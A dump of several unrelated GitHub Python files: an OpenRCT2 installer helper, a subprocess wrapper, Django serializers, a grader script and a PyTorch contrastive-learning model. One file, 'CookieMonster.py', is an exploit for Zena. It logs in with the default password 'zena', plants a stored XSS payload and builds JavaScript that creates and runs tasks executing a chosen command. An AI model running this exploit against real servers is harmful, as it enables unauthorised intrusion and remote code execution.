"Transformation Pipelines.py", "file_ext": "py", "file_size_in_byte": 736, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sklearn.pipeline.Pipeline", "line_number": 3, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "22713885401", "text": "import logging\nimport os.path\nimport subprocess\nimport platform\nimport util.timeout\n\n\ndef get_install_folder_and_version() -> tuple:\n \"\"\"Gets the version and install path of OpenRCT2 from the Windows Registry.\n\n :return: Tuple with installation path an version string respectively. If an installation is not found, a tuple of None and None are returned.\n :rtype: tuple\n \"\"\"\n # Only Windows has the winreg package, so make sure the script doesn't go apeshit in other systems\n if platform.system() == \"Windows\":\n import winreg\n logging.info(\"Attempting to find Windows install...\")\n\n access_registry = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)\n openrct2_key_location = r\"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OpenRCT2\"\n\n try:\n access_key = winreg.OpenKey(access_registry, openrct2_key_location)\n except FileNotFoundError:\n logging.warning(\"OpenRCT2 installation not found\")\n return None, None\n\n install_location = winreg.QueryValueEx(access_key, \"Install Folder\")[0]\n version = winreg.QueryValueEx(access_key, \"DisplayVersion\")[0]\n\n logging.debug(f\"Found install info - Location: {install_location}\")\n\n return install_location, version\n\n\n@util.timeout.exit_after(180)\ndef do_silent_install(temp_dir: str, installer_path: str):\n \"\"\"Runs a NSIS-based installer in silent mode under a subprocess and waits for it to finish.\n\n :param temp_dir: Temporary directory to be used\n :type temp_dir: str\n :param installer_path: Path where the .zip containing the .app folder is located\n :type installer_path: str\n \"\"\"\n logging.info(\"Installing for Windows...\")\n\n command = f\"\\\"{os.path.join(temp_dir, installer_path)}\\\" /S\"\n logging.debug(f\"Running command: {command}\")\n process = subprocess.Popen(command, shell=True)\n process.wait()\n", "repo_name": "androidWG/Corkscrew", "sub_path": "install/windows.py", "file_name": "windows.py", "file_ext": "py", "file_size_in_byte": 1915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "platform.system", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "winreg.ConnectRegistry", "line_number": 19, "usage_type": "call"}, {"api_name": "winreg.HKEY_LOCAL_MACHINE", "line_number": 19, "usage_type": "attribute"}, {"api_name": "winreg.OpenKey", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 25, "usage_type": "call"}, {"api_name": "winreg.QueryValueEx", "line_number": 28, "usage_type": "call"}, {"api_name": "winreg.QueryValueEx", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 47, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 49, "usage_type": "call"}, {"api_name": "util.timeout.timeout.exit_after", "line_number": 36, "usage_type": "call"}, {"api_name": "util.timeout.timeout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "util.timeout", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "20377787241", "text": "import asyncio\nimport subprocess\nimport sys\n\nfrom asyncio import Future\nfrom asyncio.subprocess import DEVNULL\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\n\nclass NonZeroExitCode(Exception):\n def __init__(self, program, args, exit_code, stdout, stderr):\n super().__init__(f\"{program} {args} exited with {exit_code}\")\n self.program = program\n self.program_args = args\n self.exit_code = exit_code\n self.stdout = stdout\n self.stderr = stderr\n\n\nasync def system(\n program,\n *args,\n stdin=None,\n stdout_raw=False,\n stdout_text=False,\n stdout_stripped=False,\n stderr=True,\n stderr_text=False,\n stdout_future=False,\n **kwargs,\n) -> Union[None, str, bytes, Tuple[subprocess.Popen, Future]]:\n if hasattr(stdin, \"read\"):\n stdin_file = stdin\n stdin_text = \"\"\n elif isinstance(stdin, str):\n stdin_file = subprocess.PIPE\n stdin_text = stdin\n else:\n stdin_file = subprocess.PIPE\n stdin_text = \"\"\n capture_stdout = stdout_raw or stdout_text or stdout_stripped\n\n if capture_stdout:\n stdout = subprocess.PIPE\n else:\n stdout = sys.stdout\n\n capture_stderr = stderr and stderr_text\n if capture_stderr:\n stderr = subprocess.PIPE\n elif stderr:\n stderr = sys.stderr\n else:\n stderr = DEVNULL\n\n loop = asyncio.get_running_loop()\n process = subprocess.Popen(\n [program, *args],\n stdin=stdin_file,\n stdout=stdout,\n stderr=stderr,\n **kwargs,\n )\n\n async def get_output(output_future: Optional[Future] = None):\n if stdin_file == subprocess.PIPE:\n stdout, stderr = await loop.run_in_executor(\n None, lambda: process.communicate(stdin_text.encode(\"utf-8\"))\n )\n else:\n stdout, stderr = await loop.run_in_executor(\n None, lambda: process.communicate()\n )\n\n output = None\n if capture_stdout:\n if stdout_raw:\n output = stdout\n else:\n stdout_text = stdout.decode(\"utf-8\")\n if stdout_stripped:\n stdout_text = stdout_text.strip()\n output = stdout_text\n\n exit_code = process.returncode\n exception = None\n if exit_code != 0:\n exception = NonZeroExitCode(\n program,\n args,\n exit_code,\n stdout.decode(\"utf-8\")\n if isinstance(stdout, bytes)\n else stdout,\n stderr.decode(\"utf-8\")\n if isinstance(stderr, bytes)\n else stderr,\n )\n\n if stdout_future and exception:\n output_future.set_exception(exception)\n elif stdout_future and output_future:\n output_future.set_result(output)\n elif exception:\n raise exception\n\n return output\n\n if stdout_future:\n output_future = loop.create_future()\n loop.create_task(get_output(output_future))\n return process, output_future\n else:\n return await get_output()\n\n\ndef system_sync(*args, **kwargs):\n return asyncio.run(system(*args, **kwargs))\n", "repo_name": "meya-customers/meya-sdk", "sub_path": "meya/util/system.py", "file_name": "system.py", "file_ext": "py", "file_size_in_byte": 3270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "subprocess.PIPE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 48, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asyncio.subprocess.DEVNULL", "line_number": 56, "usage_type": "name"}, {"api_name": "asyncio.get_running_loop", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 59, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 67, "usage_type": "name"}, {"api_name": "asyncio.Future", "line_number": 67, "usage_type": "name"}, {"api_name": "subprocess.PIPE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 33, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 33, "usage_type": "attribute"}, {"api_name": "asyncio.Future", "line_number": 33, "usage_type": "name"}, {"api_name": "asyncio.run", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "11427205043", "text": "from rest_framework import serializers\nfrom .models import *\n\n\nclass CreateFundingSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Funding\n fields = ['creator_id', 'type', 'fund_cause', 'phone_number', 'total_fund',\n 'amount_raise', 'description', 'image', 'is_closed', 'is_verified', 'ngo_certificate']\n\n def create(self, validated_data):\n creator = User.objects.get(id=validated_data['creator_id'].id)\n validated_data['created_id'] = creator\n fund = Funding.objects.create(\n creator_id=validated_data['creator_id'],\n type=validated_data['type'],\n fund_cause=validated_data['fund_cause'],\n phone_number=validated_data['phone_number'],\n total_fund=validated_data['total_fund'],\n amount_raise=validated_data['amount_raise'],\n description=validated_data['description'],\n image=validated_data['image'],\n is_closed=validated_data['is_closed'],\n is_verified=validated_data['is_verified'],\n ngo_certificate=validated_data['ngo_certificate']\n )\n return fund\n\n\n# class FundingCrowdSerializer(serializer.ModelSerializer):\n# image_url = serializers.SerializerMethodField('get_image_url')\n\n# class Meta:\n# model = Funding\n# fields = ['creator_id', 'type', 'fund_cause', 'phone_number', 'total_fund',\n# 'amount_raise', 'description', 'image', 'is_closed', 'is_verified', 'ngo_certificate', 'image']\n\n# def get_image_url(self, obj):\n# request = self.context.get(\"request\")\n# return request.build_absolute_uri(obj.image.url)\n\n\nclass UpdateFundingSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = FundingUpdates\n fields = '__all__'\n\n def create(self, validated_data):\n funding = Funding.objects.get(\n id=validated_data['funding_id'].id)\n validated_data['funding_id'] = funding\n return FundingUpdates.objects.create(**validated_data)\n\n\nclass CommentFundingSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = FundingComments\n fields = '__all__'\n\n def create(self, validated_data):\n funding = Funding.objects.get(id=validated_data['funding_id'].id)\n user_id = User.objects.get(id=validated_data['user_id'].id)\n validated_data['funding_id'] = funding\n validated_data['user_id'] = user_id\n return FundingComments.objects.create(**validated_data)\n", "repo_name": "shreyasrami/LOC4.0_RuntimeTerror", "sub_path": "server/crowdfunding/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2529, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 57, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "73845178113", "text": "# Zena XSS to RCE exploit. Exploit is reliant on a credential cookie theft to perform RCE component.\n\nimport os\nimport sys\nimport json\nimport requests\n\n\nclass CookieMonster:\n\n def __init__(self, host, port, tls, cmd):\n if tls is True:\n self.host = \"https://\" + host + \":\" + port\n else:\n self.host = \"http://\" + host + \":\" + port\n self.cmd = cmd\n self.webConfigLogin = [\"GET\", \"/oc_main/cm/clientManager/login?pwd=zena\"]\n self.webConfigPlugin = [\"PUT\", \"/oc_main/cm/zenaPlugins\"]\n self.clientMgrCreateTsk = [\"POST\", \"/oc_main/zenaweb/definitions\"]\n self.clientMgrExecTsk = [\"POST\", \"\"]\n self.getUsers = [\"GET\", \"/oc_main/zenaweb/definitions/logins\"]\n self.getAgents = [\"GET\", \"/oc_main/zenaweb/agents\"]\n self.userAgent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n\n def controller(self):\n sessionID = self.login()\n self.XSS(sessionID)\n\n def login(self):\n\n headers = {\n \"Host\": self.host,\n \"User-Agent\": self.userAgent,\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Connection\": \"close\",\n \"Referer\": self.host + \"/webconfig/index.html\"\n }\n req = requests.get(self.host + self.webConfigLogin[1], headers=headers)\n responseHeaders = json.dumps(dict(req.headers))\n responseHeaders = json.loads(responseHeaders)\n jsessionID = responseHeaders[\"Set-Cookie\"].split(\";\")[0]\n\n return jsessionID # To be used for malicious connector creation\n\n\n def XSS(self, sessionID):\n\n payload = {\n \"NAME\": \"\",\n \"DB_URL\": \"http://test.com\",\n \"DB_USER\": \"test\",\n \"DB_TYPE\": \"MSSQL\",\n \"DB_DRIVER\": \"com.microsoft.sqlserver.jdbc.SQLServerDriver\",\n \"DB_PASSWORD\": \"test\",\n \"DESCRIPTION\": \"test\",\n \"ENABLED\": \"true\"\n }\n\n headers = {\n \"Host\": self.host,\n \"User-Agent\": self.userAgent,\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"application/json\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Content-Length\": str(sys.getsizeof(payload)),\n \"Connection\": \"close\",\n \"Referer\": self.host + \"/webconfig/index.html\",\n \"Cookie\": sessionID\n }\n\n print(\"[+] Starting XSS..\")\n req = requests.put(self.host + self.webConfigPlugin[1], data=json.dumps(payload), headers=headers)\n response = str(req.content)\n if \"true\" in response:\n print(\"[+] Payload Successfully Delivered!\")\n\n def jsPayload(self):\n\n # Replace JS Placeholders with payload data\n payload = open(os.path.realpath(\"payload-js.txt\"), \"r\").read()\n payload = payload.replace(\"\", self.getUsers[0])\n payload = payload.replace(\"\", self.getUsers[1])\n payload = payload.replace(\"\", self.getAgents[0])\n payload = payload.replace(\"\", self.getAgents[1])\n payload = payload.replace(\"\", self.clientMgrCreateTsk[0])\n payload = payload.replace(\"\", self.host + self.clientMgrCreateTsk[1])\n payload = payload.replace(\"\", self.clientMgrExecTsk[0])\n payload = payload.replace(\"\", self.host)\n payload = payload.replace(\"\", self.cmd)\n\n return payload\n\n\nif __name__ == '__main__':\n # Args\n host = str(sys.argv[1])\n port = str(sys.argv[2])\n tls = str(sys.argv[3])\n cmd = str(sys.argv[4])\n # Exec\n CookieMonster(host, port, tls, cmd).controller()\n", "repo_name": "JetP1ane/Zena", "sub_path": "CookieMonster.py", "file_name": "CookieMonster.py", "file_ext": "py", "file_size_in_byte": 3999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.put", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 102, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 103, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 104, "usage_type": "attribute"}]} +{"seq_id": "69802206914", "text": "import sys\nimport json \nimport random\nimport io\n\ndico_good = { \"success\": True , \"errormessages\" : \"\" , \"execution\": \"OK\", \"feedback\": \"ok\", \"other\": \"\" }\ndico_bad = { \"success\": False , \"errormessages\" : \"\", \"execution\": \"\", \"feedback\": \"modifier votre valeur\", \"other\": \"\" }\n\nstudent=None\ndef hiddenimport():\n\tglobal student\n\t'''\n\tréalise l'import de student\n\tsi il y a un problème d'execution termine l'execution du grader avec les informations de l'exception.\n\tredirection de la sortie standard dans un StringIO pour ne pas polluter la sortie standard.\n\t'''\n\ttry:\n\t\tbob = io.StringIO()\n\t\toldstd = sys.stdout\n\t\tsys.stdout = bob\n\t\timport student\n\t\tsys.stdout=oldstd\n\texcept Exception as e:\n\t\tsys.stdout=oldstd\n\t\tdico_bad[\"errormessages\"]= str(e)\n\t\tdico_bad[\"execution\"]= bob.getvalue()\n\t\tdico_bad[\"feedback\"]= \"Ecrivez du code syntaxiquement correct\"\n\t\tprint(json.dumps(dico_bad))\n\t\tsys.exit(1)\n\n\nhiddenimport()\n\n# le code haut dessus de cette ligne ne seras plus visible dans la prochaine version\n\na=random.randint(1,20)\nb=random.randint(1,20)\n\nif not 'binop' in student.__dict__:\n\tdico_bad[\"errormessages\"]= \"Fonction binop non définie\"\n\tdico_bad[\"execution\"]= \"\"\n\tdico_bad[\"feedback\"]= \" veuillez écrire une fonction binop avec le mot clef def \" \n\tprint(json.dumps(dico_bad))\nelif student.binop(a,b) == a*b :\n\tdico_good[\"execution\"]= \"la fonction binop(%s , %s ) retourne un résultat exacte %s \" % (a,b,student.binop(a,b))\n\tprint(json.dumps(dico_good)) \nelse:\n\tdico_bad[\"execution\"] = \"la fonction binop(%s , %s ) retourne un résultat erroné %s alors que le résultat attendu est %s\" % (a,b,binop(a,b),a*b) \n\tprint(json.dumps(dico_bad))\n\n", "repo_name": "plgitlogin/demo", "sub_path": "python/exemples/hiddenimport.py", "file_name": "hiddenimport.py", "file_ext": "py", "file_size_in_byte": 1652, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "io.StringIO", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 37, "usage_type": "call"}, {"api_name": "student.__dict__", "line_number": 39, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}, {"api_name": "student.binop", "line_number": 44, "usage_type": "call"}, {"api_name": "student.binop", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "13391373102", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport einops\nimport numpy as np\nfrom priorityQueue import priorityQueue_torch\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nclass SmCoModel(nn.Module):\n def __init__(self, base_encoder, input_dim = 3, feature_dim = 10, K = 128, m = 0.999, t = 0.07, mlp = False):\n \"\"\"\n\n :param base_encoder: encoder obj\n :type base_encoder:\n :param input_dim: encoder mdoel input dimension for initial the encoder model\n :type input_dim:\n :param feature_dim:encoder model output dimension, and also the embedding feature's number\n :type feature_dim:\n :param K: the length of the queue\n :type K:\n :param m:the momentum parameter\n :type m:\n :param t:the softmax temperature\n :type t:\n :param mlp:judge if the fc layer is only one\n :type mlp:\n \"\"\"\n super(SmCoModel, self).__init__()\n self.K = K\n self.m = m\n self.t = t\n\n self.encoder_q = base_encoder(num_classes = feature_dim)\n self.encoder_k = base_encoder(num_classes = feature_dim)\n\n if mlp:# 判定是否需要增加全连接层 正常需要增加有两个全连接层\n input_mlp = self.encoder_q.fc.weight.shape[1]# weight的维度为:output x input\n print(\"input dimension is \", self.encoder_q.fc.weight.shape)\n self.encoder_q.fc = nn.Sequential(\n nn.Linear(in_features=input_mlp, out_features=input_mlp),\n nn.ReLU(inplace=True),\n self.encoder_q.fc\n\n )\n self.encoder_k.fc = nn.Sequential(\n nn.Linear(in_features=input_mlp, out_features=input_mlp),\n nn.ReLU(inplace=True),\n self.encoder_k.fc\n )\n\n # 初始化权重 k的权重值是由q决定的 并且无反向传播\n for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):\n param_k.data.copy_(param_q)\n param_k.requires_grad = False\n\n # 定义queue queue初始化的时候 是通过在0到1内随机正态分布采样进行初始化\n self.register_buffer(\"queue\", torch.randn([feature_dim, self.K]))\n self.queue = F.normalize(self.queue, dim=0)\n self.register_buffer(\"queue_ptr\", torch.zeros(1, dtype=torch.long))# 指针 操控队列\n\n # 三种权重生成算法\n # 计算q和k_queue的权重 相似度越小/距离越大 权重越大 相似度越大/距离越小 权重越小\n @torch.no_grad()\n def _weight_method_euclidean(self, q):\n \"\"\"\n\n :param q: q_embedding\n :type q: [bs, c]\n :param self.queue: the queue of k_embedding\n :type self.queue:[c, k]\n :return:weight\n :rtype:[bs, queue_length]\n \"\"\"\n bs = q.size()[0]\n k_length = self.queue.shape[-1]\n k_queue = self.queue.T # [128, 10]->[k, c]\n\n # xq [bs, queue_len, feature_num]\n xq = einops.repeat(q, \"b c->b n c\", n = k_length)\n\n # xk [bs, queue_len, feature_num]\n xk = einops.repeat(k_queue, \"k c->n k c\", n=bs)\n\n # all_embedding_eluc [bs, queue_len] [i, j] 代表 第i个batch中 第k_queue[j]与q的欧式距离\n all_embedding_eluc = torch.norm(xq-xk, p=2, dim=-1)\n weight = 1/(1+all_embedding_eluc)\n # print(f\"the weight is{weight}, and the shape is {weight.shape} \")\n return weight\n\n\n\n @torch.no_grad()\n def _weight_method_cos_similarity(self, q):\n \"\"\"\n\n 注意一点 相似度代表的是相似程度 常用余弦相似度 余弦相似度相似度越大 代表越相似 但是这里越相似我们需要的权重值越小\n 所以不能用余弦相似度 这里采用的是正弦相似度 正弦相似度越大 代表越不相似 和所需权重相吻合\n :param q: q_embedding\n :type q: [bs, c]\n :param self.queue: the queue of k_embedding\n :type self.queue:[c, k]\n :return:weight\n :rtype:[bs, queue_length]\n \"\"\"\n bs = q.size()[0]\n k_length = self.queue.shape[-1]\n k_queue = self.queue.T # [128, 10]->[k, c]\n\n # xq [bs, queue_len, feature_num]\n xq = einops.repeat(q, \"b c->b n c\", n=k_length)\n\n # xk [bs, queue_len, feature_num]\n xk = einops.repeat(k_queue, \"k c->n k c\", n=bs)\n cos_sim = torch.cosine_similarity(xq, xk, dim=-1)\n # print(f\"cos_sim shape is{cos_sim.shape}, and the num is {cos_sim}\")\n # 计算正弦相似度\n sin_sim = 1-cos_sim**2\n # print(f\"weight shape is{sin_sim.shape}, and the num is {sin_sim}\")\n weight = sin_sim\n # 归一化处理\n # weight = .5+.5*cos_sim\n return weight\n\n @torch.no_grad()\n def _dijkstra(self, adj):\n n = adj.size()[0]\n distance = np.inf * torch.ones(n)\n distance[0] = 0\n q = priorityQueue_torch(0)\n while not q.is_Empty():\n v, dv = q.top()\n v = int(v)\n q.pop()\n if dv != distance[v]:\n continue\n for i, weight in enumerate(adj[v]):\n if weight < 0:\n continue\n if weight == 0 and i != v:\n continue\n else:\n to = i\n if distance[v] + weight < distance[to]:\n distance[to] = distance[v] + weight\n q.push(torch.tensor([to, distance[to]]))\n\n return distance\n\n @torch.no_grad()\n def _weight_method_isomap(self, q, n_node=5):\n \"\"\"\n\n :param q: query embedding\n :type q: [bs c]\n :param n_node: the k num that we wanna get to approximate the eluc distance\n :type n_node: int\n :return: weight\n :rtype: [bs, queue_length]\n \"\"\"\n bs = q.size()[0]\n k_queue_t = self.queue.T#[k, c]\n xk = einops.repeat(k_queue_t, \"k c->n k c\", n=bs)# [bs k c]\n xq = q.unsqueeze(1)# [bs 1 c]\n all = torch.cat([xq, xk], dim=1)# [bs, k+1, c]\n # print(all.shape)\n new_k_len = self.K+1\n xall = einops.repeat(all, \"b k c->b k n c\", n=new_k_len)\n yall = einops.repeat(all, \"b k c->b n k c\", n=new_k_len)\n all_eluc = torch.norm(xall-yall, p=2, dim=-1)\n value, index = torch.topk(input=all_eluc, k=new_k_len-n_node, dim=-1, sorted=True, largest=False)\n source = torch.zeros(all_eluc.shape).to(device)\n source -= 1\n new_all_eluc = torch.scatter(dim=2, index=index, input=all_eluc, src=source)\n distance = None\n for i in range(bs):\n if distance is None:\n distance = self._dijkstra(new_all_eluc[i])\n else:\n distance = torch.vstack([distance, self._dijkstra(new_all_eluc[i])])\n # print(distance)\n distance = distance[:, 1:]\n new_distance = torch.where(torch.isinf(distance), torch.full_like(distance, 0), distance)\n mx = torch.max(new_distance)\n new_distance = torch.where(torch.isinf(distance), torch.full_like(distance, mx+1), distance)\n weight = 1/(1+new_distance).to(device)\n # print(weight.shape)\n # [bs k]\n return weight\n\n @torch.no_grad()\n def _momentum_update_key_encoder(self):\n \"\"\"\n Momentum update of the key encoder\n \"\"\"\n for param_q, param_k in zip(self.encoder_q.parameters(), self.encoder_k.parameters()):\n param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)\n\n @torch.no_grad()\n def _update_queue_weight(self, weight, bs):\n \"\"\"\n Update the queue weight as weighted neg sample\n weight shape is [bs k]\n \"\"\"\n # assert list(weight.shape)[0]==self.K\n weight = weight.to(device)\n x_queue = einops.repeat(self.queue, \"c k->n c k\", n=bs)# x_queue[bs c k]\n bs_weighted_queue = torch.einsum(\"bck,bk->bck\", [x_queue, weight])\n # shape is [bs c k]\n return bs_weighted_queue\n\n @torch.no_grad()\n def _dequeue_and_enqueue(self, keys):\n bs = keys.size()[0]\n ptr = int(self.queue_ptr)\n # print(ptr)\n assert self.K % bs == 0\n # print(keys.T.shape)\n # print(self.queue[:, ptr:ptr+bs].shape)\n # 主要是为了防止训练的batch 不完全的问题\n if (keys.T.shape[1] == self.queue[:, ptr:ptr+bs].shape[1]):\n self.queue[:, ptr:ptr+bs] = keys.T\n else:\n l = self.queue[:, ptr:ptr+bs].shape[1]\n self.queue[:, ptr:ptr+bs] = keys.T[:, :l]\n self.queue[:, 0:(ptr+bs)%self.K] = keys.T[:, l:]\n # self.queue[:, ptr:ptr+bs] = keys.T\n ptr = (ptr + bs) % self.K\n self.queue_ptr[0] = ptr\n\n @torch.no_grad()\n def _generate_weight(self, q, method=\"i\"):\n \"\"\"\n generate the weight of the queue's neg vec\n :return:weight\n :rtype:[K]\n \"e\" is _weight_method_euclidean()\n \"\"\"\n # return torch.randn([4, self.K]).to(device=device)\n # weight = self._weight_method_euclidean(q)\n if method == \"e\":\n # print(\"\\033[31;1m{}\\033[0m\".format(\"the weight generated method you are uing is euclidean\"))\n weight = self._weight_method_euclidean(q).cuda(0)\n elif method == \"c\":\n # print(\"\\033[31;1m{}\\033[0m\".format(\"the weight generated method you are uing is sin_similarity\"))\n weight = self._weight_method_cos_similarity(q).cuda(0)\n elif method == \"none\":\n # print(\"\\033[31;1m{}\\033[0m\".format(\"you are not using weight generated method\"))\n weight = torch.zeros([q.size()[0], self.K])+1\n else:\n # print(\"\\033[31;1m{}\\033[0m\".format(\"the weight generated method you are uing is isomap\"))\n weight = self._weight_method_isomap(q).cuda(0)\n # weight = self._weight_method_isomap(q)\n # print(\"weight is \", weight)\n return weight\n\n def forward(self, img_q, img_k):\n \"\"\"\n\n :param img_k: a batch of key image\n :type img_k: [bs channels w h]\n :param img_q: a batch of query image\n :type img_q: [bs channels w h]\n :return: logits label\n :rtype:\n \"\"\"\n bs = img_q.size()[0]\n q = self.encoder_q(img_q)\n q = F.normalize(q, dim=-1)\n\n # self._weight_method_isomap(q)\n\n with torch.no_grad():\n self._momentum_update_key_encoder()\n k = self.encoder_k(img_k )\n k = F.normalize(k, dim=-1)\n weight = self._generate_weight(q)\n # shape[bs c k]\n bs_weighted_queue = self._update_queue_weight(weight=weight, bs=bs)#[]\n # l_pos = [N, 1]\n l_pos = torch.einsum('nc,nc->n', [q, k]).unsqueeze(-1)\n # l_neg = [N, K]\n l_neg = torch.einsum('nc,nck->nk', [q, bs_weighted_queue.detach()])\n\n # logits = [N, K+1]\n logits = torch.cat([l_pos, l_neg], dim=1)\n # temperature\n logits /= self.t\n\n labels = torch.zeros(logits.shape[0], dtype=torch.long).cuda()\n\n #dequeue and enqueue\n self._dequeue_and_enqueue(k)\n return logits, labels\n\n\n\n# def main():\n# image = torch.randn([4, 1, 28, 28]).to(device=device)\n# # model = Encoder(_input_dim=1, _output_dim=10).to(device=device)\n# smco_model = SmCo(Encoder, input_dim=1, feature_dim=10).to(device=device)\n# logits, labels = smco_model(image, image)\n# # print(f\"logits is {logits}, labels is {labels}\")\n# print(f\"logits shape is {logits.shape}, label shape is {labels.shape}\")\n#\n#\n#\n# if __name__ == '__main__':\n# main()", "repo_name": "EricSalvatore/SmPro", "sub_path": "SMCO/SmCo.py", "file_name": "SmCo.py", "file_ext": "py", "file_size_in_byte": 11699, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.device", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 60, 